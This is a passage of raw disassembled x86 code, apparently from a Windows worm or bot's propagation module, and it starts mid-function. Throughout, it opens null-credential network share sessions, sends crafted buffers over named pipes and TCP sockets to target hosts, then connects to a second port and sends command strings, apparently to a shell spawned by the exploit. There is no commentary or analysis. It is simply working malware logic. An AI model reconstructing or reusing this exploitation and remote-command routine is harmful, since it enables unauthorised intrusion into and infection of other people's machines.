mov byte ptr [ebp+WideCharStr], al
pop ecx
xor eax, eax
lea edi, [ebp+WideCharStr+1]
rep stosd
stosw
stosb
lea eax, [ebp+WideCharStr]
push 0FFh ; cchWideChar
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
xor edi, edi
push edi ; dwFlags
push edi ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
lea eax, [ebp+WideCharStr]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41814B
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41814B
mov esi, [ebp+lpNetResource]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset unk_440F98
push edi ; dwFlags
push eax ; lpUserName
push eax ; lpPassword
push esi ; lpNetResource
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call WNetAddConnection2W
cmp eax, 5
mov ebx, 4C3h
jz short loc_4036B9
cmp eax, ebx
jnz short loc_4036C3
loc_4036B9: ; CODE XREF: sub_4035F5+BE�j
push edi ; dwFlags
push edi ; lpUserName
push edi ; lpPassword
push esi ; lpNetResource
call WNetAddConnection2W
loc_4036C3: ; CODE XREF: sub_4035F5+C2�j
cmp eax, 5
jz short loc_4036D1
cmp eax, ebx
jz short loc_4036D1
xor eax, eax
inc eax
jmp short loc_4036D3
; ---------------------------------------------------------------------------
loc_4036D1: ; CODE XREF: sub_4035F5+D1�j
; sub_4035F5+D5�j
xor eax, eax
loc_4036D3: ; CODE XREF: sub_4035F5+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4035F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4036D8(LPCSTR lpMultiByteStr)
sub_4036D8 proc near ; CODE XREF: .text:00403A58�p
; .text:00403B38�p
Name = word ptr -354h
var_34E = byte ptr -34Eh
WideCharStr = word ptr -124h
var_C = byte ptr -0Ch
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, 4286F8h
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, 4286F0h
lea edi, [ebp+Name]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, CommandLine
pop ecx
mov byte ptr [ebp+WideCharStr], al
xor eax, eax
lea edi, [ebp+WideCharStr+1]
push 0FFh ; cchWideChar
rep stosd
stosw
stosb
lea eax, [ebp+WideCharStr]
xor esi, esi
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push esi ; dwFlags
push esi ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
lea eax, [ebp+WideCharStr]
push eax
lea eax, [ebp+Name]
push eax
call sub_41814B
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+Name]
push eax
call sub_41814B
add esp, 10h
jmp short loc_403776
; ---------------------------------------------------------------------------
loc_40376B: ; CODE XREF: sub_4036D8+AF�j
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
loc_403776: ; CODE XREF: sub_4036D8+91�j
push esi ; fForce
lea eax, [ebp+Name]
push esi ; dwFlags
push eax ; lpName
call WNetCancelConnection2W
test eax, eax
jnz short loc_40376B
pop edi
inc eax
pop esi
leave
retn
sub_4036D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40378E(SOCKET s, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int)
sub_40378E proc near ; CODE XREF: .text:00403A84�p
; .text:00403BC5�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
s = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_417F30
push esi
push edi
push 431644h
mov esi, 0A7h
push [ebp+s] ; s
mov [ebp+var_4], esi
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_417296
mov edi, eax
add esp, 10h
test edi, edi
jz loc_4039DA
push ebx
mov ebx, 42860Ch
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_417A40
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_4179E0
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_417A40
lea esi, [edi+0D7h]
jmp short loc_403850
; ---------------------------------------------------------------------------
loc_403812: ; CODE XREF: sub_40378E+D0�j
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_417A40
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_4179E0
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_417A40
lea esi, [esi+edi+30h]
loc_403850: ; CODE XREF: sub_40378E+82�j
add esp, 24h
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_403812
cmp [ebp+arg_C4], 0
jz short loc_40387B
cmp [ebp+arg_C0], 3
jz short loc_403884
cmp [ebp+arg_C0], 0
jmp short loc_403882
; ---------------------------------------------------------------------------
loc_40387B: ; CODE XREF: sub_40378E+D9�j
cmp [ebp+arg_C0], 3
loc_403882: ; CODE XREF: sub_40378E+EB�j
jnz short loc_40388D
loc_403884: ; CODE XREF: sub_40378E+E2�j
push 4
push 4286ECh
jmp short loc_403894
; ---------------------------------------------------------------------------
loc_40388D: ; CODE XREF: sub_40378E:loc_403882�j
push 4
push 4286E8h
loc_403894: ; CODE XREF: sub_40378E+FD�j
lea eax, [ebp+var_1FE0]
push eax
call sub_417A40
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push 428220h
push eax
call sub_417A40
push 10h
lea eax, [ebp+var_CA4]
push 428584h
push eax
call sub_417A40
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_417A40
lea edi, [esi+370h]
push 3Ch
push 428598h
lea eax, [ebp+edi+var_1004]
push eax
call sub_417A40
add edi, 3Ch
push 30h
push 4285D8h
lea eax, [ebp+edi+var_1004]
push eax
call sub_417A40
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_418175
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_4179E0
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_417A40
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_4039DA: ; CODE XREF: sub_40378E+3E�j
pop edi
pop esi
leave
retn
sub_40378E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1138h
call sub_417F30
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_403B4C
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_4035F5
pop ecx
test eax, eax
pop ecx
jz loc_403C5C
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-138h]
push 428704h
push eax
call sub_41795B
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp-138h]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call dword ptr byte_424084
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+0Ch]
jnz short loc_403A63
loc_403A57: ; CODE XREF: .text:00403B04�j
push eax
call sub_4036D8
pop ecx
jmp loc_403C5C
; ---------------------------------------------------------------------------
loc_403A63: ; CODE XREF: .text:00403A55�j
push 2
push eax
call sub_40E022
pop ecx
lea esi, [ebp+8]
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40378E
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_403AF8
mov edi, 186A0h
push edi
call sub_418175
mov esi, eax
push edi
push ebx
push esi
call sub_4179E0
add esp, 10h
lea eax, [ebp-0Ch]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push 4281D0h
push dword ptr [ebp-4]
call TransactNamedPipe ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_403AE8
lea eax, [ebp-14h]
push ebx
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call WriteFile ; WriteFile
test eax, eax
jnz short loc_403B09
loc_403AE8: ; CODE XREF: .text:00403ACE�j
push esi
call sub_418227
push dword ptr [ebp-8]
call sub_418227
pop ecx
pop ecx
loc_403AF8: ; CODE XREF: .text:00403A94�j
push dword ptr [ebp-4]
call dword ptr byte_424074+4
lea eax, [ebp+0Ch]
jmp loc_403A57
; ---------------------------------------------------------------------------
loc_403B09: ; CODE XREF: .text:00403AE6�j
lea eax, [ebp-0Ch]
push ebx
push eax
push edi
push esi
push dword ptr [ebp-4]
call dword ptr byte_424074
push dword ptr [ebp-8]
mov edi, eax
call sub_418227
push esi
call sub_418227
pop ecx
pop ecx
push dword ptr [ebp-4]
call dword ptr byte_424074+4
lea eax, [ebp+0Ch]
push eax
call sub_4036D8
cmp edi, 1
pop ecx
jnz loc_403C6D
jmp loc_403C5C
; ---------------------------------------------------------------------------
loc_403B4C: ; CODE XREF: .text:004039F8�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_40E022
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_403C5C
xor ebx, ebx
push ebx
push 1
push 2
call socket_0
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_403C5C
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
mov word ptr [ebp-24h], 2
push dword ptr [ebp+0A8h]
call htons_2
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call inet_addr_0
mov [ebp-20h], eax
push ebx
lea eax, [ebp-0Ch]
push esi
push eax
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40378E
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_403BDE
push dword ptr [ebp-4]
jmp short loc_403C56
; ---------------------------------------------------------------------------
loc_403BDE: ; CODE XREF: .text:00403BD7�j
mov edi, [ebp-4]
lea eax, [ebp-24h]
push 10h
push eax
push edi
call connect_0
cmp eax, 0FFFFFFFFh
jnz short loc_403BF6
loc_403BF3: ; CODE XREF: .text:00403C08�j
push esi
jmp short loc_403C4F
; ---------------------------------------------------------------------------
loc_403BF6: ; CODE XREF: .text:00403BF1�j
push ebx
push 48h
push 4281D0h
push edi
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_403BF3
mov esi, 1000h
push ebx
lea eax, [ebp-1138h]
push esi
push eax
push edi
call recv_0
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_403C37
push dword ptr [ebp-8]
jmp short loc_403C4F
; ---------------------------------------------------------------------------
loc_403C37: ; CODE XREF: .text:00403C30�j
push ebx
lea eax, [ebp-1138h]
push esi
push eax
push edi
call recv_0
push dword ptr [ebp-8]
cmp eax, 0FFFFFFFFh
jnz short loc_403C60
loc_403C4F: ; CODE XREF: .text:00403BF4�j
; .text:00403C35�j
call sub_418227
pop ecx
push edi
loc_403C56: ; CODE XREF: .text:00403BDC�j
call closesocket_0
loc_403C5C: ; CODE XREF: .text:00403A0F�j
; .text:00403A5E�j ...
xor eax, eax
jmp short loc_403C7B
; ---------------------------------------------------------------------------
loc_403C60: ; CODE XREF: .text:00403C4D�j
call sub_418227
pop ecx
push edi
call closesocket_0
loc_403C6D: ; CODE XREF: .text:00403B41�j
push 3E8h
call Sleep ; Sleep
xor eax, eax
inc eax
loc_403C7B: ; CODE XREF: .text:00403C5E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
jmp $+5
push 0BB80h
push 76Ch
call sub_4164B5
pop ecx
mov dword_440FA0, eax
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403C9C(SOCKET s, char cp)
sub_403C9C proc near ; CODE XREF: sub_403DDC+42C�p
buf = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
name = sockaddr ptr -10h
s = dword ptr 8
cp = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+cp]
mov [ebp+name.sa_family], 2
push eax ; cp
call inet_addr_0
mov dword ptr [ebp+name.sa_data+2], eax
mov ax, word ptr dword_440FA0
push eax ; hostshort
call htons_2
push esi ; protocol
push 1 ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
call socket_0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403DB5
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call connect_0
cmp eax, 0FFFFFFFFh
jz loc_403DB5
push esi ; flags
lea eax, [ebp+buf]
push 400h ; len
push eax ; buf
push ebx ; s
call recv_0
mov esi, 431644h
push esi
push esi
push dword_4410C0
push [ebp+s] ; s
call sub_40B972
pop ecx
mov edi, 190h
push eax
push 429110h
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_417EDA
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+var_1A0]
push eax ; buf
push ebx ; s
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_403DB5
push 1F4h ; dwMilliseconds
call Sleep ; Sleep
push esi
push 429108h
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_417EDA
add esp, 10h
lea eax, [ebp+var_1A0]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+var_1A0]
push eax ; buf
push ebx ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_403DB9
loc_403DB5: ; CODE XREF: sub_403C9C+51�j
; sub_403C9C+67�j ...
xor al, al
jmp short loc_403DD7
; ---------------------------------------------------------------------------
loc_403DB9: ; CODE XREF: sub_403C9C+117�j
push 0 ; flags
lea eax, [ebp+buf]
push 400h ; len
push eax ; buf
push ebx ; s
call recv_0
push ebx ; s
call closesocket_0
mov al, 1
loc_403DD7: ; CODE XREF: sub_403C9C+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_403C9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403DDC(char, char, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, SOCKET s, int)
sub_403DDC proc near ; CODE XREF: .text:0040433F�p
; .text:00404361�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
buf = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = dword ptr -6
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
s = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_417F30
mov eax, dword ptr unk_429190
push ebx
mov [ebp+var_10], eax
mov eax, dword ptr unk_429194
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push 429184h
push eax
call sub_41795B
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_403E15: ; CODE XREF: sub_403DDC+4F�j
mov cl, [ebp+eax+var_3C]
mov [ebp+eax*2-103h], bl
mov [ebp+eax*2+var_104], cl
inc eax
cmp eax, 28h
jl short loc_403E15
push 60h
lea eax, [ebp+buf]
push 428C10h
push eax
call sub_417A40
lea eax, [ebp+var_3C]
push eax
call sub_4180D0
add eax, eax
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_417A40
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push 428C67h
push eax
call sub_4180D0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_417A40
lea eax, [ebp+var_3C]
push eax
call sub_4180D0
add al, 1Ah
push 1
add al, al
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_417A40
lea eax, [ebp+var_3C]
push eax
call sub_4180D0
add al, al
push 1
add al, 9
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_417A40
mov ax, word ptr dword_440FA0
add esp, 2Ch
push eax ; hostshort
call htons_2
xor eax, 9999h
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push 428908h
call sub_417A40
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_403FDA
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_4179E0
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, [eax+429050h]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_417A40
mov esi, 428858h
push esi
call sub_4180D0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_417A40
push 4
lea eax, [ebp+var_11AC]
push 42917Ch
push eax
call sub_417A40
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_417A40
add esp, 40h
push esi
call sub_4180D0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_417A40
add esp, 10h
xor eax, eax
loc_403F8C: ; CODE XREF: sub_403DDC+1C8�j
mov cl, [ebp+eax+var_1CC4]
mov [ebp+eax*2-4803h], bl
mov [ebp+eax*2+var_4804], cl
inc eax
cmp eax, edi
jl short loc_403F8C
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_4179E0
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_4179E0
add esp, 18h
jmp short loc_404031
; ---------------------------------------------------------------------------
loc_403FDA: ; CODE XREF: sub_403DDC+119�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_4179E0
mov esi, 428858h
push esi
call sub_4180D0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_417A40
lea eax, [ebp+var_10]
push eax
call sub_4180D0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_417A40
mov eax, dword ptr unk_429050
add esp, 2Ch
mov [ebp+var_768], eax
loc_404031: ; CODE XREF: sub_403DDC+1FC�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_4179E0
movsx eax, [ebp+var_1]
mov edi, [ebp+s]
add esp, 0Ch
add eax, 4
push ebx ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push edi ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_404070
loc_404069: ; CODE XREF: sub_403DDC+2BB�j
; sub_403DDC+2E2�j ...
xor al, al
jmp loc_404218
; ---------------------------------------------------------------------------
loc_404070: ; CODE XREF: sub_403DDC+28B�j
mov esi, 640h
push ebx ; flags
lea eax, [ebp+var_744]
push esi ; len
push eax ; buf
push edi ; s
call recv_0
push ebx ; flags
push 68h ; len
push offset unk_428C78 ; buf
push edi ; s
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_404069
push ebx ; flags
lea eax, [ebp+var_744]
push esi ; len
push eax ; buf
push edi ; s
call recv_0
push ebx ; flags
push 0A0h ; len
push offset unk_428CE8 ; buf
push edi ; s
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_404069
push ebx ; flags
lea eax, [ebp+var_744]
push esi ; len
push eax ; buf
push edi ; s
call recv_0
cmp [ebp+arg_C0], ebx
jz loc_404186
push 68h
lea eax, [ebp+var_89B4]
push 428EA8h
push eax
call sub_417A40
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_417A40
push 70h
lea eax, [ebp+var_68DC]
push 428F18h
push eax
call sub_417A40
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_417A40
push 84h
lea eax, [ebp+var_5DA8]
push 428F90h
push eax
call sub_417A40
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx ; flags
push 10FCh ; len
push eax ; buf
push edi ; s
call send_0
cmp eax, 0FFFFFFFFh
jz loc_404069
push ebx ; flags
lea eax, [ebp+var_744]
push esi ; len
push eax ; buf
push edi ; s
call recv_0
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_4041DC
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_403DDC+2FA�j
push 7Ch
lea eax, [ebp+var_2CA8]
push 428D90h
push eax
call sub_417A40
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_417A40
push 90h
lea eax, [ebp+var_245C]
push 428E10h
push eax
call sub_417A40
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx ; flags
push 0CF8h ; len
loc_4041DC: ; CODE XREF: sub_403DDC+3A8�j
push eax ; buf
push edi ; s
call send_0
cmp eax, 0FFFFFFFFh
jz loc_404069
push 12Ch ; dwMilliseconds
call Sleep ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403C9C
add esp, 0BCh
test al, al
setnz al
loc_404218: ; CODE XREF: sub_403DDC+28F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403DDC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 654h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_4164B5
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_4179E0
add esp, 14h
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call inet_addr_0
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call htons_2
push 6
push 1
push 2
mov [ebp-12h], ax
call socket_0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404325
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call connect_0
cmp eax, 0FFFFFFFFh
jz loc_404325
push edi
push 89h
push 4289F0h
push ebx
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_404325
mov esi, 640h
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call recv_0
push edi
push 0A8h
push 428A80h
push ebx
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_404325
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call recv_0
push edi
push 0DEh
push 428B30h
push ebx
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_404325
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call recv_0
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40432C
dec eax
jz short loc_404329
loc_404325: ; CODE XREF: .text:00404280�j
; .text:00404296�j ...
xor eax, eax
jmp short loc_404398
; ---------------------------------------------------------------------------
loc_404329: ; CODE XREF: .text:00404323�j
push edi
jmp short loc_404350
; ---------------------------------------------------------------------------
loc_40432C: ; CODE XREF: .text:00404320�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403DDC
add esp, 0C4h
test al, al
jnz short loc_404370
push 1
loc_404350: ; CODE XREF: .text:0040432A�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403DDC
add esp, 0C4h
test al, al
jz short loc_404377
loc_404370: ; CODE XREF: .text:0040434C�j
mov dword ptr [ebp-4], 1
loc_404377: ; CODE XREF: .text:0040436E�j
push ebx
call closesocket_0
cmp dword ptr [ebp-4], 0
jz short loc_404395
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, [eax+42B628h]
inc dword ptr [eax]
loc_404395: ; CODE XREF: .text:00404382�j
xor eax, eax
inc eax
loc_404398: ; CODE XREF: .text:00404327�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40439D proc near ; CODE XREF: sub_404609+E�p
; sub_404609+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40439D endp
; =============== S U B R O U T I N E =======================================
sub_4043A7 proc near ; CODE XREF: sub_404609+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_418175
mov edi, eax
pop ecx
test edi, edi
jz short loc_4043D9
push ebx
push 0
push edi
call sub_4179E0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_417A40
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_4043D9: ; CODE XREF: sub_4043A7+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4043A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E1 proc near ; CODE XREF: sub_4044D3+18�p
; sub_40454D+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_418175
mov esi, eax
pop ecx
test esi, esi
jz short loc_40442D
push edi
push 0
push esi
call sub_4179E0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_417A40
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_417A40
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40442D: ; CODE XREF: sub_4043E1+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_4043E1 endp
; =============== S U B R O U T I N E =======================================
sub_404436 proc near ; CODE XREF: sub_4044D3+5E�p
; sub_4044D3+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_404446
push eax ; lpMem
call sub_418227
pop ecx
loc_404446: ; CODE XREF: sub_404436+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_404436 endp
; =============== S U B R O U T I N E =======================================
sub_40444F proc near ; CODE XREF: sub_4044D3+20�p
; sub_4045AE+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_404479
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_418175
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40447D
